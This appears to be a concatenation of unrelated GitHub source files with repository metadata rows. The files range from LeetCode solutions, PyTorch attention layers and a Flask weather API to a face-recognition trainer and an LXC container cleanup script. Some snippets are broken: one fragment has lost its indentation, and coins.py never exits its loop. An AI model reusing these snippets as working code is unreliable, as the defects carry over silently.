abc=len(myre)
print(myre)
print(abc)
str5=""
for k in range(1,abc):
str5=str5+myre[k]+" "
man_id=myre[0]
str4=str5[:-1]
print(str4)
for j in range(glen):
res11=g[j][:-3]
res12=res11[1:]
res13=re.split(r'\)?\s\(',res12)
res14=re.split(r'\s',res13[1])[-1]
res15=res13[-1]
res16=re.split(r'\s+',res15)
length1=len(res16)
str10=""
for k in range(1,length1):
str10=str10+res16[k]+" "
if(res14==man_id):
if('@PUNCT-OpenParen@PUNCT-OpenParen'in str4 and abc==2):
print("")
else:
for k in range(1,n+1):
if(int(anu_id)==int(k)):
list_P[k]=str10[:-1]
flagg=0
try:
g=open("manual_lwg.dat",'r').readlines()
glen=len(g)
except:
flagg=1
log.write("manual_lwg.dat not found")
if(flag7==0):
n7=len(f7)
for i in range(n7): #P1_Layer
res=f7[i][:-3]
res1=res[1:]
res2=re.split(r'\)?\s+\(',res1)
res3=res2[-1]#for Group_ID
res4=res2[1]# for Anu_ID
res5=re.split('\s+',res3)
res6=re.split('\s+',res4)[1]
#print(res6)
#print(res5[1])
m1=len(res5)
m2=len(res6)
str1=""
for j in range(m1):
if(j!=0):
str1=str1+res5[j]+" "
#print(str1)
for k in range(n+1):
if(int(k)==int(res6)):
str1=str1[:-1]
list_P1[k]=str1
print(list_P1)
if(flag8==0):
n8=len(f8)
for i in range(n8):#DICT Layer
res=f8[i][1:]
res1=res[:-3]
res2=re.split(r'\)?\s\(',res1)
id1=re.split('\s+',res2[3]) #H_id
id2=re.split('\s+',res2[1]) #E_id
print(id1)
m1=len(id1)
m2=len(id2)
str1=""
for j in range(m1):
if(j!=0):
str1=str1+id1[j]+" "
number=id2[-1]
for k in range(n):
#print("1")
if(int(k)==int(number)):
str1=str1[:-1]
list_DICT[k]=str1
print(list_DICT)
if(flag9==0):
n9=len(f9)
for i in range(n9):#R Layer
res=f9[i][1:]
res1=res[:-3]
res2=re.split(r'\)?\s\(',res1)
id1=re.split('\s+',res2[3]) #H_id
id2=re.split('\s+',res2[1]) #E_id
print(id1)
m1=len(id1)
m2=len(id2)
str1=""
for j in range(m1):
if(j!=0):
str1=str1+id1[j]+" "
number=id2[-1]
for k in range(n):
#print("1")
if(int(k)==int(number)):
str1=str1[:-1]
list_R[k]=str1
print(list_R)
log.close()
with open("H_alignment_parserid.csv", 'w') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerow(list_A)
csvwriter.writerow(list_K)
csvwriter.writerow(list_K_partial)
csvwriter.writerow(list_L)
csvwriter.writerow(list_M)
csvwriter.writerow(list_N)
csvwriter.writerow(list_O)
csvwriter.writerow(list_P)
csvwriter.writerow(list_P1)
csvwriter.writerow(list_DICT)
csvwriter.writerow(list_R)
| [
"saumya@anu"
] | saumya@anu |
6a589c3f2246fe20b2c1aa3620a55f667b64a3d0 | 6d57d900dd04fbc8bc06da1570b91bf110d2b46a | /coins.py | b5c9765e9cd35e410a720eac2bc19e54b2849753 | [] | no_license | seilcho7/week_1-python | 3644d25bc3921ad6e5a545e991df5edef3811030 | 71f620c00d09a975c3f5a3f53a56327b30ed64ea | refs/heads/master | 2020-04-24T00:37:09.136987 | 2019-02-20T00:15:25 | 2019-02-20T00:15:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | coins = 0
no_stop = True
while no_stop:
print("You have %d coins." % (coins))
ask_coins = input("Do you want another? ")
if ask_coins == "yes":
coins = coins + 1
elif ask_coins =="no":
print("Bye")
stop = False
| [
"seilcho7@hotmail.com"
] | seilcho7@hotmail.com |
df2805ded0f8ca965205b075e6a84753cff47e12 | b2fb3c44c67eb61c41465996c24c094071c457cc | /LeetCode/print_words_vertically.py | 3027e23f1272d85cbab87a94fe941c5d21586733 | [] | no_license | zelzhan/Challenges-and-contests | 8edd3a2f07a0538903dc885c86e15f02783821c5 | e7df9b37ad1130d37f3efbf0114d06b6f3b4a4f1 | refs/heads/master | 2022-12-28T23:16:30.807040 | 2020-10-13T10:09:22 | 2020-10-13T10:09:22 | 118,697,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 928 | py | from collections import defaultdict
class Solution:
def printVertically(self, s: str) -> List[str]:
s = s.split(" ")
hashtable = defaultdict(int)
for i, string in enumerate(s):
hashtable[i] = len(string)
max_length = max(hashtable.values())
j = 0
res = []
def pop_zeroes(cont):
i = -1
while cont[i] == " ":
cont.pop()
while j != max_length:
word = []
for i, string in enumerate(s):
if hashtable[i] == 0:
word.append(" ")
else:
hashtable[i] -=1
word.append(string[j])
j+=1
pop_zeroes(word)
res.append("".join(word))
return res
| [
"noreply@github.com"
] | noreply@github.com |
7e1eb1cb818f46327bce95c194898ef7c0b8d4ae | adfc039a4fa6550068b659db2169995b23b88ffa | /staticJsonRead1.py | cd860a781fa914d006a1fe290d4facff538ebb71 | [] | no_license | nitinawathare/EVDExperimentSetup | b1928bc4a740618503830cff153c6853e802a41f | cd7289ba75a5bdc25c46d89203ed7bb314ac3b50 | refs/heads/master | 2022-05-12T18:26:08.991695 | 2019-11-14T07:40:30 | 2019-11-14T07:40:30 | 186,911,557 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | import json, ast
from pprint import pprint
with open('/home/ubuntu/gitRepoEVD/.ethereum1/static-nodes.json') as fopen:
data = json.load(fopen)
print(data[0])
| [
"nitinawathare14@gmail.com"
] | nitinawathare14@gmail.com |
77c7c60572f8a72ca13834fc8673b3b32542bf3a | 1347c41e3957ce7c9c1d10b25f0fd20a3e450b36 | /labs/ex03/template/costs.py | 14a3696f00ecc9c86c42a022aaa204b6b578ff7d | [] | no_license | hmoreau94/ML_course | a8f93e95c2ba0234a5ed5825c4e45038b548ada8 | ced2268f571f8f1481a9353902b20f54f311aaa7 | refs/heads/master | 2021-01-11T06:21:03.044575 | 2016-10-12T13:38:07 | 2016-10-12T13:38:07 | 70,158,204 | 0 | 0 | null | 2016-10-06T13:47:43 | 2016-10-06T13:47:41 | Jupyter Notebook | UTF-8 | Python | false | false | 494 | py | # -*- coding: utf-8 -*-
"""a function used to compute the cost."""
import numpy as np
def compute_cost_mae(y, tx, w):
"""calculate the cost.
you can calculate the cost by mae.
"""
e = np.absolute(y - np.dot(tx,w))
toReturn = (np.sum(e) / y.shape[0])
return toReturn
def compute_cost_mse(y, tx, w):
"""calculate the cost.
you can calculate the cost by mse.
"""
e = y - np.dot(tx,w)
toReturn = (np.dot(e.T, e) / (2*y.shape[0]))
return toReturn | [
"moreauhugo@me.com"
] | moreauhugo@me.com |
a412224fa7b20001afa3b1a7ae02d7fa57aef086 | 64cd387bd26410d072571d579ff3791e8729e8ef | /modeling/attention.py | 71d12c40f14544d8f03e214d51fa04b65bd512bb | [
"Apache-2.0"
] | permissive | xdeng7/scale-aware_da | 41f064022f61a47bb31c20b511886318803765ac | c69066524b4d234441081d587d0afc45fa2f585d | refs/heads/main | 2023-03-11T19:24:29.304387 | 2021-03-04T01:53:43 | 2021-03-04T01:53:43 | 311,015,579 | 18 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,059 | py | from torch import nn
import torch
class CALayer(nn.Module):
def __init__(self, channel, reduction=16):
super(CALayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.conv_du = nn.Sequential(
nn.Conv2d(channel, channel // reduction,1, bias=False),
nn.ReLU(inplace=True),
nn.Conv2d(channel // reduction, channel,1,bias=False),
nn.Sigmoid()
)
def forward(self, x):
b, c, _, _ = x.size()
y = self.avg_pool(x)
y = self.conv_du(y)
return x * y
class SELayer(nn.Module):
def __init__(self, channel, reduction=16):
super(SELayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Linear(channel, channel // reduction, bias=False),
nn.ReLU(inplace=True),
nn.Linear(channel // reduction, channel, bias=False),
nn.Sigmoid()
)
def forward(self, x):
b, c, _, _ = x.size()
y = self.avg_pool(x).view(b, c)
y = self.fc(y).view(b, c, 1, 1)
return x * y.expand_as(x)
## Residual Channel Attention Block (RCAB)
class RCAB(nn.Module):
def __init__(
self, n_feat, kernel_size, reduction,
bias=True, bn=False, act=nn.ReLU(True), res_scale=1):
super(RCAB, self).__init__()
modules_body = []
# import pdb
# pdb.set_trace()
for i in range(2):
modules_body.append(nn.Conv2d(n_feat, n_feat, kernel_size, bias=bias))
if bn: modules_body.append(nn.BatchNorm2d(n_feat))
if i == 0: modules_body.append(act)
modules_body.append(CALayer(n_feat, reduction))
self.body = nn.Sequential(*modules_body)
self.res_scale = res_scale
def forward(self, x):
# import pdb
# pdb.set_trace()
res = self.body(x)
#res = self.body(x).mul(self.res_scale)
res += x
return res
class CAM_Module(nn.Module):
""" Channel attention module"""
def __init__(self):
super(CAM_Module, self).__init__()
# self.channel_in = in_dim
self.gamma = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1)
def forward(self,x):
"""
inputs :
x : input feature maps( B X C X H X W)
returns :
out : attention value + input feature
attention: B X C X C
"""
m_batchsize, C, height, width = x.size()
proj_query = x.view(m_batchsize, C, -1)
proj_key = x.view(m_batchsize, C, -1).permute(0, 2, 1)
energy = torch.bmm(proj_query, proj_key)
energy_new = torch.max(energy, -1, keepdim=True)[0].expand_as(energy)-energy
attention = self.softmax(energy_new)
proj_value = x.view(m_batchsize, C, -1)
out = torch.bmm(attention, proj_value)
out = out.view(m_batchsize, C, height, width)
out = self.gamma*out + x
return out,attention
| [
"noreply@github.com"
] | noreply@github.com |
dfabe356284d91b7abe48701e4cb31e026728bd1 | e8d719fe45dfbff9cbbc4ed872832cec6cabaca6 | /307_Range_Sum_Query_Mutable_TLE.py | 09a96706fa016fe861dd7404e808a7fa4a7d89a3 | [] | no_license | nlfox/leetcode | 64f4f48d7f4be6df0542e51cc7037df40bf184a3 | d61363f99de3d591ebc8cd94f62544a31a026d55 | refs/heads/master | 2020-12-21T01:43:01.792899 | 2016-11-14T23:10:12 | 2016-11-14T23:10:12 | 56,680,839 | 2 | 0 | null | 2016-05-17T17:16:37 | 2016-04-20T11:19:58 | Python | UTF-8 | Python | false | false | 1,088 | py | class NumArray(object):
def __init__(self, nums):
"""
initialize your data structure here.
:type nums: List[int]
"""
self.nums = nums
self.len = len(nums)
self.d = []
last = 0
for i in nums:
self.d.append(last)
last += i
self.d.append(last)
def update(self, i, val):
"""
:type i: int
:type val: int
:rtype: int
"""
self.nums[i] = val
last = self.d[i]
for j in xrange(i+1, self.len + 1):
last += self.nums[j - 1]
self.d[j] = last
def sumRange(self, i, j):
"""
sum of elements nums[i..j], inclusive.
:type i: int
:type j: int
:rtype: int
"""
return self.d[j + 1] - self.d[i]
# Your NumArray object will be instantiated and called as such:
numArray = NumArray([9, -8])
print numArray.update(0, 3)
print numArray.sumRange(1, 1)
print numArray.sumRange(0, 1)
print numArray.update(1, -3)
print numArray.sumRange(0, 1)
| [
"nlfox@msn.cn"
] | nlfox@msn.cn |
f9d41e644050b1e8ccffbcfc55ed36679fc061d4 | 54e406e685c0f78d1cd8d88a0107428729296d1c | /Who装配/member_test.py | 5aa320b6fb8246f9eecdda8d60d5f140151d5ccb | [] | no_license | Kate-Lin/who_is_who | 9ce656fae6910854cad69533669c41e658c530d5 | 420901819197ee18879d025fa07d8bb9c1e676df | refs/heads/master | 2020-09-24T01:40:20.379241 | 2019-12-08T09:06:25 | 2019-12-08T09:06:25 | 225,631,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,030 | py | #! /usr/bin/env python
#coded by Lin Shen, 20190513
#########################################
#import modules needed
import os
import rospy
from geometry_msgs.msg import PoseStamped
from std_msgs.msg import String,Int16
import tf
import tf2_ros
from sound_play.libsoundplay import SoundClient
import sys
import freenect
import cv2
import numpy as np
from PIL import Image
import time
import math
from std_srvs.srv import Empty
import actionlib
import actionlib_msgs.msg
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal, MoveBaseResult
from geometry_msgs.msg import Pose, Point, Quaternion
from beginner_tutorials.msg import PeoplePose
import shutil
from cv2 import cv as cv
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
class Remember_Member:
def __init__(self):
self.path = '/home/ros/robocup/src/beginner_tutorials/launch/member'
rospy.loginfo("In the __init__()")
self.recognizer = cv2.createLBPHFaceRecognizer()
self.face_cascade=cv2.CascadeClassifier('/usr/share/opencv/haarcascades/haarcascade_frontalface_alt.xml')
self.frame = ''
self.face_rects = ''
self.load_path = '/home/ros/robocup/src/beginner_tutorials/launch/train_member/member.yml'
shutil.copyfile('/home/ros/robocup/src/beginner_tutorials/launch/WhoIsWho_yaml/trainningdata.yml',self.load_path)
self.train()
self.recognize()
def getIMagesWithID(self, path):
imagePaths = [os.path.join(path,f) for f in os.listdir(path)]
faces = []
IDs = []
for imagePath in imagePaths:
faceImg = Image.open(imagePath).convert('L')
faceNp = np.array(faceImg, 'uint8')
ID = int(os.path.split(imagePath)[-1].split('.')[1])
faces.append(faceNp)
IDs.append(ID)
cv2.waitKey(10)
return IDs, faces
def train(self):
for i in range(1,101):
img_path = self.path + "/" + str(i) + ".jpg"
print img_path
self.frame = cv2.imread(img_path)
#cv2.imshow('face',self.frame)
gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)
self.face_rects = self.face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in self.face_rects:
face = self.frame[y:y+h-w*0.07,x+w*0.15:x+w-w*0.15]
cv2.imwrite("/home/ros/robocup/src/beginner_tutorials/launch/member_faces/user."+str(i)+".jpg",face)
#cv2.imshow('FaceDetector',self.frame)
path = '/home/ros/robocup/src/beginner_tutorials/launch/member_faces'
Ids, faces = self.getIMagesWithID(path)
self.recognizer.train(faces,np.array(Ids))
self.recognizer.save(self.load_path)
cv2.destroyAllWindows()
def recognize(self):
self.recognizer.load(self.load_path)
frame = cv2.imread(self.path+'/18.jpg')
self.frame = cv2.resize(frame, None,fx=1.0,fy=1.0,interpolation=cv2.INTER_AREA)
gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)
faces = self.face_cascade.detectMultiScale(gray,1.3,5)
for (x,y,w,h) in faces:
ids,conf = self.recognizer.predict(gray[y:y+h-w*0.07,x+w*0.15:x+w-w*0.15])
cv2.rectangle(self.frame,(x,y),(x+w,y+h),(0,255,0),1)
print ids,conf
if __name__ == "__main__":
Remember_Member() | [
"oncwnuLedn4TbGotWjICLQETNKDk@git.weixin.qq.com"
] | oncwnuLedn4TbGotWjICLQETNKDk@git.weixin.qq.com |
585d43a1a1ba55b36a4a4fb310dc1ec619374015 | 884b78b9bdc19200cae87e532fa6458a92def273 | /tk_test.py | a352191428c86b270ef587da27db1795e78280cc | [] | no_license | andermic/cousins | 78bd68bf630c003ab21dfb110b3684615fbc0489 | 980f5a3ac50bb3f4847c1d02e5f74c97f9f8c5eb | refs/heads/master | 2016-09-16T15:57:18.053704 | 2015-01-19T15:26:55 | 2015-01-19T15:26:55 | 7,281,208 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | #! /usr/bin/python
from Tkinter import *
class MyApp:
def __init__(self, parent):
self.parent = parent
self.f1 = Frame(parent)
self.f1.pack()
self.b1 = Button(self.f1, text='click', bg='blue')
self.b1.pack(side=LEFT)
self.b1.bind('<Button-1>', self.b1_left_click)
self.b1.bind('<Return>', self.b1_left_click)
self.b2 = Button(self.f1, text='goodbye!', background='red')
self.b2.pack(side=LEFT)
self.b2.bind('<Button-2>', self.b2_right_click)
def b1_left_click(self, event):
self.b1['text'] = self.b1['text'] + 'click'
def b2_right_click(self, event):
self.parent.destroy()
root = Tk()
myapp = MyApp(root)
root.mainloop()
| [
"ptolemy777@gmail.com"
] | ptolemy777@gmail.com |
820aed6c6cda925ce81e6dcae90fc907ee2f0393 | 905d9f4b94a1b198b29cfd7f347a847471ef92b1 | /core/authentication.py | c95893727c638455d2864f7e48b3e0f41b38252a | [] | no_license | prixite/backend-template | 8addd6d38c2ecce92aaf8225c75e1eab00c802eb | ca0676eae35c507a6b51abeff04fc2bf430bccde | refs/heads/master | 2023-06-11T03:08:55.462576 | 2021-07-03T09:07:36 | 2021-07-03T09:07:36 | 379,807,726 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | from rest_framework import authentication
class TokenAuthentication(authentication.TokenAuthentication):
keyword = 'Bearer'
| [
"umair.waheed@gmail.com"
] | umair.waheed@gmail.com |
36052de6dd45ad86930ea87779a2ffd46de82b96 | 28a78bf095125a1202842225c2d7512079017a02 | /argorithm/2884_re.py | 35e05cb9fef74bc98182ae9affe95a92feff041a | [] | no_license | sunyeongchoi/sydsyd_challenge | d322451a82c63b05097d44ee3b9fc4492645e204 | 93dd250e96b91f50215a61a3b5913a523f074445 | refs/heads/master | 2023-05-25T00:57:58.651494 | 2023-05-18T01:43:00 | 2023-05-18T01:43:00 | 293,253,085 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | H, M = map(int, input().split())
if M >= 45:
print(H, M-45)
else:
if H == 0:
H = 24
print(H-1, (60+M)-45) | [
"sn0716@naver.com"
] | sn0716@naver.com |
6e35f494ebe7c070ad17b73bbe9ec7029e8c0f99 | 2a2d5458160bbec34bb1be7c53dde620d293d818 | /cheb.py | 16bb696a1ba5e9e9e3fb947666bd05bcc8764fb1 | [] | no_license | dowoncha/Mathematics | bf4eeb490e77e53f70abc2671524aefbbf7a9a60 | 948e1f5e8cbe76f564e35ea1dc34b665d6bf5208 | refs/heads/master | 2020-06-20T11:47:03.158869 | 2016-11-27T19:36:37 | 2016-11-27T19:36:37 | 74,867,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | from numpy import polynomial as P
if __name__ == "__main__":
p = P.Polynomial([1, -1.0/2, -1.0/8, -3.0/24, -15.0/384, -165.0/3840])
print p
c = p.convert(kind=P.Chebyshev)
print c
print c.basis(3)
| [
"dowoncha@live.unc.edu"
] | dowoncha@live.unc.edu |
22425d8ae6d33997675bb88ca7f2f42436dcf5c9 | 071ccc8d8eeb9983824d61c740c5476c59dbdc88 | /app.py | e15da6bf3a4e9937978f75220e7051cc27fbe63d | [] | no_license | dewizdumb/SQLAlchemy | d2aaa0c617f95264acc23b3ea152b0cb6a62d194 | 8075fb8ef9ed8ccbd4a8cb7735477ac577f55254 | refs/heads/master | 2020-07-22T03:08:02.736484 | 2019-09-29T07:07:42 | 2019-09-29T07:07:42 | 207,056,497 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,613 | py | from flask import Flask , jsonify
import sqlalchemy
from sqlalchemy import create_engine, func
from sqlalchemy.orm import Session
from sqlalchemy.ext.automap import automap_base
import datetime as dt
from sqlalchemy.orm import scoped_session, sessionmaker
#############################################
# Database Setup
#############################################
engine = create_engine("sqlite:///Resources/hawaii.sqlite",echo=False)
Base = automap_base()
Base.prepare(engine, reflect=True)
Measurement = Base.classes.measurement
Station = Base.classes.station
session = scoped_session(sessionmaker(bind=engine))
last_date = session.query(
Measurement.date
).order_by(
Measurement.date.desc()
).first()[0]
last_date = dt.datetime.strptime(last_date,"%Y-%m-%d")
first_date = last_date - dt.timedelta(days = 365)
############################################
# Flask Setup
############################################
app = Flask(__name__)
############################################
# Flask Setup
############################################
@app.route("/")
def welcome():
return (
f"Available Routes for Flask Server:<br/>"
f"-----------------------------------------<br/>"
f"<br/>"
f"The dates and temperature observations from the last year:<br/>"
f"/api/v1.0/precipitation<br/>"
f"-----------------------------------------<br/>"
f"<br/>"
f"List of stations from the dataset:<br/>"
f"/api/v1.0/stations<br/>"
f"-----------------------------------------<br/>"
f"<br/>"
f"List of Temperature Observations (tobs) for the previous year:<br/>"
f"/api/v1.0/tobs<br/>"
f"-----------------------------------------<br/>"
f"<br/>"
f"List of the minimum temperature, the average temperature, and the max temperature for given date (ie- June 1, 2017:<br/>"
f"Replace 'start' with YYYY-MM-DD</br>"
f"/api/v1.0/start<br/>"
f"-----------------------------------------<br/>"
f"<br/>"
f"List of the minimum temperature, the average temperature, and the max temperature for a given start and end date (ie- June 1 - 10, 2017):<br/>"
f"Replace 'start/end' with YYYY-MM-DD/YYYY-MM-DD</br>"
f"/api/v1.0/start/end<br/>"
f"-----------------------------------------<br/>"
f"<br/>"
)
@app.route("/api/v1.0/precipitation")
def precipitation():
year_data = session.query(
Measurement.date,
Measurement.prcp
).filter(
Measurement.date > first_date
).order_by(
Measurement.date
).all()
precipitation_data = dict(year_data)
return jsonify({'Data':precipitation_data})
@app.route("/api/v1.0/stations")
def stations():
stations = session.query(Station).all()
stations_list = list()
for station in stations:
stations_dict = dict()
stations_dict['Station'] = station.station
stations_dict["Station Name"] = station.name
stations_dict["Latitude"] = station.latitude
stations_dict["Longitude"] = station.longitude
stations_dict["Elevation"] = station.elevation
stations_list.append(stations_dict)
return jsonify ({'Data':stations_list})
@app.route("/api/v1.0/tobs")
def tobs():
year_tobs = session.query(
Measurement.tobs,
Measurement.date,
Measurement.station
).filter(
Measurement.date > first_date
).all()
temp_list = list()
for data in year_tobs:
temp_dict = dict()
temp_dict['Station'] = data.station
temp_dict['Date'] = data.date
temp_dict['Temp'] = data.tobs
temp_list.append(temp_dict)
return jsonify ({'Data':temp_list})
@app.route("/api/v1.0/<start>")
def start_temp(start=None):
start_temps = session.query(
func.min(Measurement.tobs),
func.avg(Measurement.tobs),
func.max(Measurement.tobs)
).filter(
Measurement.date >= start
).all()
start_list = list()
for tmin, tavg, tmax in start_temps:
start_dict = {}
start_dict["Min Temp"] = tmin
start_dict["Max Temp"] = tavg
start_dict["Avg Temp"] = tmax
start_list.append(start_dict)
return jsonify ({'Data':start_list})
@app.route("/api/v1.0/<start>/<end>")
def calc_temps(start=None,end=None):
temps = session.query(
func.min(Measurement.tobs),
func.avg(Measurement.tobs),
func.max(Measurement.tobs)
).filter(
Measurement.date >= start,
Measurement.date <= end
).all()
temp_list = list()
for tmin, tavg, tmax in temps:
temp_dict = dict()
temp_dict["Min Temp"] = tmin
temp_dict["Avg Temp"] = tavg
temp_dict["Max Temp"] = tmax
temp_list.append(temp_dict)
return jsonify ({'Data':temp_list})
if __name__ == '__main__':
app.run(debug=True) | [
"dewizdumb@gmail.com"
] | dewizdumb@gmail.com |
546e8f3fe2ac890b2ad0e6c2249cd2e0ec0a27ed | c4c20c4c7653da52249dac4d9ced3ffcbcb2c299 | /aidooit_access_point/migrations/0002_aidooitaccesspoint_address.py | 2969a68765ae5b7b7748cbc2949a9d5d57913c8e | [] | no_license | rejamen/aidooit | 4ebccdba65b07da29f13273c474dd45ddd78968d | 31361307b70175d4e00ef4f7bbbb320ab7779551 | refs/heads/master | 2022-05-02T09:25:14.812540 | 2019-09-09T10:34:30 | 2019-09-09T10:34:30 | 191,284,990 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | # Generated by Django 2.2.4 on 2019-09-08 03:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('aidooit_access_point', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='aidooitaccesspoint',
name='address',
field=models.CharField(default='', max_length=300),
preserve_default=False,
),
]
| [
"rejamen@gmail.com"
] | rejamen@gmail.com |
aa8118a8fbf2bd888e4917357eff53df4984fcfb | e5ce97f343b2617cce0396ebcfa3b9af70601393 | /lale/search/search_space.py | dd7406b30be41bbe8bb4af33119a2a8df40b3eed | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | kant/lale | c29f4be10ac7e36e0342b67cae26368381f0a3a1 | 972b4284775f1c2dfa8d1692381fdb0ddd1cfafe | refs/heads/master | 2020-07-01T09:46:53.848785 | 2019-08-07T16:30:56 | 2019-08-07T16:30:56 | 201,133,071 | 0 | 0 | Apache-2.0 | 2019-08-07T21:51:57 | 2019-08-07T21:51:57 | null | UTF-8 | Python | false | false | 4,657 | py | # Copyright 2019 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import logging
import numpy
from typing import Any, Dict, List, Set, Iterable, Iterator, Optional, Tuple, Union
from hyperopt import hp
from hyperopt.pyll import scope
from lale.util.VisitorMeta import AbstractVisitorMeta
from lale.search.PGO import FrequencyDistribution
logging.basicConfig(level=logging.WARNING)
logger = logging.getLogger(__name__)
PGO_input_type = Union[FrequencyDistribution, Iterable[Tuple[Any, int]], None]
class SearchSpace(metaclass=AbstractVisitorMeta):
def __init__(self):
pass
class SearchSpaceEnum(SearchSpace):
pgo:Optional[FrequencyDistribution]
vals:List[Any]
def __init__(self, vals:Iterable[Any], pgo:PGO_input_type=None):
super(SearchSpaceEnum, self).__init__()
self.vals = sorted(vals, key=str)
if pgo is None or isinstance(pgo, FrequencyDistribution):
self.pgo = pgo
else:
self.pgo = FrequencyDistribution.asEnumValues(pgo, self.vals)
class SearchSpaceConstant(SearchSpaceEnum):
def __init__(self, v, pgo:PGO_input_type=None):
super(SearchSpaceConstant, self).__init__([v], pgo=pgo)
class SearchSpaceBool(SearchSpaceEnum):
def __init__(self, pgo:PGO_input_type=None):
super(SearchSpaceBool, self).__init__([True, False], pgo=pgo)
class SearchSpaceNumber(SearchSpace):
minimum:Optional[float]
exclusiveMinumum:bool
maximum:Optional[float]
exclusiveMaximum:bool
discrete:bool
distribution:str
pgo:Optional[FrequencyDistribution]
def __init__(self,
minimum=None,
exclusiveMinimum:bool=False,
maximum=None,
exclusiveMaximum:bool=False,
discrete:bool=False,
distribution="uniform",
pgo:PGO_input_type=None) -> None:
super(SearchSpaceNumber, self).__init__()
self.minimum = minimum
self.exclusiveMinimum = exclusiveMinimum
self.maximum = maximum
self.exclusiveMaximum = exclusiveMaximum
self.distribution = distribution
self.discrete = discrete
if pgo is None or isinstance(pgo, FrequencyDistribution):
self.pgo = pgo
else:
if discrete:
self.pgo = FrequencyDistribution.asIntegerValues(pgo, inclusive_min=self.getInclusiveMin(), inclusive_max=self.getInclusiveMax())
else:
self.pgo = FrequencyDistribution.asFloatValues(pgo, inclusive_min=self.getInclusiveMin(), inclusive_max=self.getInclusiveMax())
def getInclusiveMax(self):
""" Return the maximum as an inclusive maximum (exclusive maxima are adjusted accordingly)
"""
max = self.maximum
if self.exclusiveMaximum:
if self.discrete:
max = max - 1
else:
max = numpy.nextafter(max, float('-inf'))
return max
def getInclusiveMin(self):
""" Return the maximum as an inclusive minimum (exclusive minima are adjusted accordingly)
"""
min = self.minimum
if self.exclusiveMinimum:
if self.discrete:
min = min + 1
else:
min = numpy.nextafter(min, float('+inf'))
return min
class SearchSpaceArray(SearchSpace):
def __init__(self, minimum:int=0, *, maximum:int, contents:SearchSpace, is_tuple=False) -> None:
super(SearchSpaceArray, self).__init__()
self.minimum = minimum
self.maximum = maximum
self.contents = contents
self.is_tuple = is_tuple
class SearchSpaceList(SearchSpace):
def __init__(self, contents:List[SearchSpace], is_tuple=False) -> None:
super(SearchSpaceList, self).__init__()
self.contents = contents
self.is_tuple = is_tuple
class SearchSpaceObject(SearchSpace):
def __init__(self, longName:str, keys:List[str], choices:Iterable[Any]) -> None:
super(SearchSpaceObject, self).__init__()
self.longName = longName
self.keys = keys
self.choices = choices
| [
"kakate@us.ibm.com"
] | kakate@us.ibm.com |
0d31c01c1720c23342929252c36a87159a44e0d6 | ddc619da476d90bb0099a556114eedb1f93379e2 | /dateandtime.py | 509bf529027a9558e128ddafb35b2965f1da28d2 | [] | no_license | akshunive/My-sanddunes | a54a8a288262a8b2cc5d762cadca79160f949305 | 9f9f6734fdb99b46e10925682b8dc76b70627b01 | refs/heads/master | 2021-01-20T18:19:58.768886 | 2016-08-07T14:09:20 | 2016-08-07T14:09:20 | 65,136,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | #to print the date and time of the system now
import datetime
print datetime.datetime.now()
| [
"noreply@github.com"
] | noreply@github.com |
2cd95fd2f36e95c2f5317974b9ce2f58a79cf559 | 3f44f32ad6cd51076f32fe7b6c7c06c06c0b4219 | /delete_all_runway_containers.py | 9749bb06e68af4e6d3ced3bee076bc8407451a2e | [
"Apache-2.0"
] | permissive | matthewoliver/runway | b2316ea4e2fd4454b15a44da355bbd141b5b8853 | e675a36f3156d24268cae196b97c3a6a4a54c355 | refs/heads/master | 2020-04-06T04:04:10.392226 | 2017-02-26T02:04:19 | 2017-02-26T02:04:19 | 83,061,068 | 0 | 0 | null | 2017-02-24T16:28:48 | 2017-02-24T16:28:48 | null | UTF-8 | Python | false | false | 2,231 | py | #!/usr/bin/env python3
# do lxc list --format=json swift-runway
# ...and delete them
# while it would be cool if this worked, it doesn't and the docs are bad
# https://linuxcontainers.org/lxc/documentation/#python
# import lxc
# for defined in (True, False):
# for active in (True, False):
# x = lxc.list_containers(active=active, defined=defined)
# print(x, '=> lxc.list_containers(active=%s, defined=%s)' % (active, defined))
import json
import subprocess
import shlex
import os
import sys
import shutil
if os.geteuid() != 0:
print('must be run as root')
sys.exit(1)
VOLUME_GROUP = 'swift-runway-vg01'
list_command = 'lxc list --format=json'
p = subprocess.run(shlex.split(list_command), stdout=subprocess.PIPE)
containers = json.loads(p.stdout.decode())
to_delete = [x['name'] for x in containers if x['name'].startswith('swift-runway-')]
if to_delete:
delete_command = 'lxc delete --force %s' % ' '.join(to_delete)
p = subprocess.run(shlex.split(delete_command))
print('%d containers deleted' % len(to_delete))
else:
print('No containers to delete')
# delete associated lvm volumes
try:
lvlist = os.listdir('/dev/%s' % VOLUME_GROUP)
except FileNotFoundError:
